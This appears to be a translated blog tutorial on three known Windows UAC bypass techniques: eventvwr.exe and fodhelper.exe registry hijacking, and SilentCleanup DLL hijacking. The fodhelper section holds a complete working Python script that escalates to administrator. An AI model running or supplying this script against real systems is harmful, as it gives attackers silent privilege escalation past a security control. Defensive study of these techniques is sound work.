Security is a way of life.

What is UAC (User Account Control)?

UAC is an access control enforcement tool used in operating systems offered by Microsoft. Starting with Windows Vista, UAC is now actively used in Windows 10 and Windows Server operating systems.

Even if we are logged in with an account that has admin privileges, the following window appears before any application is installed.

image

It is a security measure to prevent uploads without administrator authority. Windows detects the program you want to install and asks us for a confirmation. If we click no, the installation will not occur. This prevents the application from installing without our permission. However, malicious:) hackers (whatever that means) have found ways to bypass this as well. We will talk about bypass methods in the rest of the article.

Can UAC be turned off?

This feature, which is turned on by default, can be turned off. Turning this feature off is strongly discouraged. Therefore, if you do not know enough about Windows security measures, we recommend that you do not follow the steps below.

Enter Control Panel > User Accounts Section

Click on "Change User Account Control Settings" at the bottom.

If you choose the "Never notify" option in the window that appears, you will disable this feature.

Our review of the above options will lay the groundwork for bypass methods.

1. Always warn

Always warn if:

  • When applications try to install software or make changes to my computer
  • When I make changes to Windows settings

2. Warn only when applications try to make changes to my computer (DEFAULT)

  • Don't be warned when I make changes to Windows settings

3.Warn only when applications are trying to make changes to my computer (do not fade my desktop)

  • Don't warn me when I make changes to Windows settings

3. Never warn me if:

When applications try to install software and make changes to my computer
When I make changes to Windows settings

UAC is part of the admin group on Windows. Since it is a part of this group and is an option that can be turned on and off, we should immediately consider how this can be bypassed.

UAC Bypass Method

There is one more issue we need to understand before starting the methods. "Process Tokens" created by the administrator in Windows work with some privileges, different from the processes created by a normal user. For example, let's examine what happens when you run an application by saying "Run as Administrator".

When we examine our terminal output, we can see the differences between running the cmd application as an administrator and running it without an administrator.

Method 1:

Many of the UAC bypass methods use a malicious DLL file. In this method, it is possible to bypass without using any files.

For this, let's first understand what HKEY_CLASSES_ROOT (HKCR) and HKEY_CURRENT_USER (HKCU) are in the registry and their communication with each other.

HKCR is simply a combination of HKLM:\Software\Classes and HKCU:\Software\Classes. With this combination, we can pull the HKCR:\ that we created in HKCU:\Software\Classes to perform key hijacking.

Since HKCR and HKCU are in a relationship, any "Elevated Process" that interacts with these two will be very useful for us as it will allow to interfere with the values in the HKCU.

As a normal user we have write access to the keys in the HKCU. If an "Elevated Process" interacts with keys that we can manipulate, we may have a chance to interfere with the processes that the "High-Integrity Process" is trying to perform there.

As mentioned in this link, there are some Microsoft signed binary files which are "Auto Elevate" due to their structure.

Example Scenario

The eventvwr.exe file interacts with HKCU:\Software\Classes\mscfile\shell\open\ command and outputs “Name not found”. The eventvwr.exe file also interacts with HKCR\mscfile\shell\open\ command.

When we examine HKCR\mscfile\shell\open\command, we can see that it is set to be called by default for mmc.exe (Microsoft Management Console).

We can also see that the eventvwr.exe file is queried in HKCU\Software\Classes\mscfile\shell\open\ command before HKCR\mscfile\shell\open\ command. Since the answer we received after the query we made with HKCU is "Name not found", let's look at the HKCR location:

We can see that Eventvwr.exe queries both HKCU and HKCR to launch mmc.exe as a High Integrity process. After mmc.exe runs, it opens the eventvwr.msc file that causes the Event Viewer to open. From here, we can create a registry to query the HKCU location for eventvwr.exe instead of the HKCR location, and replace the default file in HKCR\mscfile\shell\open\ command with powershell.exe.

In this way, UAC bypass can be performed without the need to send any files, reducing the risk of being caught.

Method 2:

Fodhelper.exe is a "trusted binary" found under C:\Windows\System32. When a user wants to change Optional Features from the Applications and Features screen, fodhelper.exe is running.

Fodhelper.exe contains "auto-elevation" in the configuration settings and also has a trusted certificate placed by Microsoft in a secure directory. We can infer that there is no need for UAC while running this file.

While Fodhelper.exe is running, it is based on two registry keys in the operating system. You can see them below.

Software\Classes\ms-settings\shell\open\command(default)
Software\Classes\ms-settings\shell\open\command\DelegateExecute

Again, when we look at it with an attacker eye, we can organize an attack here as we did in the previous method.

We can run a simple Python script that checks if the existing user can run the script with admin authority:

import os
import sys
import ctypes
import _winreg
def is_running_as_admin():
   '''
   Checks if the script is running with administrative privileges.
   Returns True if is running as admin, False otherwise.
   '''
   try:
       return ctypes.windll.shell32.IsUserAnAdmin()
   except:
       return False
def execute():
   if not is_running_as_admin():
       print '[!] The script is NOT running with administrative privileges'
   else:
       print '[+] The script is running with administrative privileges!'
if __name__ == '__main__':
   execute()

If we do not run the script above as an administrator, we will get the following warning:[!] The script is NOT running with administrative privileges

Now let's edit our code to bypass UAC and try to run it that way.

import os
import sys
import ctypes
import _winreg
CMD = r"C:\Windows\System32\cmd.exe"
FOD_HELPER = r'C:\Windows\System32\fodhelper.exe'
PYTHON_CMD = "python"
REG_PATH = 'Software\Classes\ms-settings\shell\open\command'
DELEGATE_EXEC_REG_KEY = 'DelegateExecute'
def is_running_as_admin():
'''
Checks if the script is running with administrative privileges.
Returns True if is running as admin, False otherwise.
'''
try:
return ctypes.windll.shell32.IsUserAnAdmin()
except:
return False
def create_reg_key(key, value):
'''
Creates a reg key
'''
try:
_winreg.CreateKey(_winreg.HKEY_CURRENT_USER, REG_PATH)
registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, REG_PATH, 0, _winreg.KEY_WRITE)
_winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value)
_winreg.CloseKey(registry_key)
except WindowsError:
raise
def bypass_uac(cmd):
'''
Tries to bypass the UAC
'''
try:
create_reg_key(DELEGATE_EXEC_REG_KEY, '')
create_reg_key(None, cmd)
except WindowsError:
raise
def execute():
if not is_running_as_admin():
print '[!] The script is NOT running with administrative privileges'
print '[+] Trying to bypass the UAC'
try:
current_dir = os.path.dirname(os.path.realpath(__file__)) + '\\' + __file__
cmd = '{} /k {} {}'.format(CMD, PYTHON_CMD, current_dir)
bypass_uac(cmd)
os.system(FOD_HELPER)
sys.exit(0)
except WindowsError:
sys.exit(1)
else:
print '[+] The script is running with administrative privileges!'
if __name__ == '__main__':
execute()

Eğer scriptimiz beklediğimiz gibi çalışırsa Komut satırımızda aşağıdaki gibi bir değişiklik olacak.

We were able to run it as Administrator, as you can see in the command line marked in red.

So what happened in the background when I ran the scripts?

In shortly, when the script runs, it tells the operating system to run our code every time it runs fodhelper.exe for two keys under Software\Classes\ms-settings\shell\open\command. After registering to the keys registry, our binary file is running. In this way, the UAC bypass is completed successfully.

Method 3:

It is known that a scheduled task called "SilentCleanup" on Windows can be run as elevated/high integrity privileges by users without admin privileges. Processes initiated by cleanmgr.exe are automatically started by upgrading their authority due to the "run with the highest authority" feature in the task configuration.

Let's take a closer look at how the attack will work.

When the cleanmgr.exe file runs, it creates a new directory named GUID in CC:\Users\<username>\AppData\Local\Temp. Later, dismhost.exe and many DLL files are copied into this folder. Dismhost.exe is then run as the high integrity process. If Dismhost.exe is started from a folder other than the GUID folder that was previously created, it starts loading DLLs from the folder where it was launched in a specific order.

This allows all users with write rights to the% TEMP% directory to capture a DLL file loaded by dismhost.exe and run a code. This attack is known as "BypassUAC".

Sources:
  • https://attack.mitre.org/techniques/T1088/
  • https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-andregistry-hijacking/
  • https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/
  • https://dzone.com/articles/bypassing-windows-10-uac-withnbsppython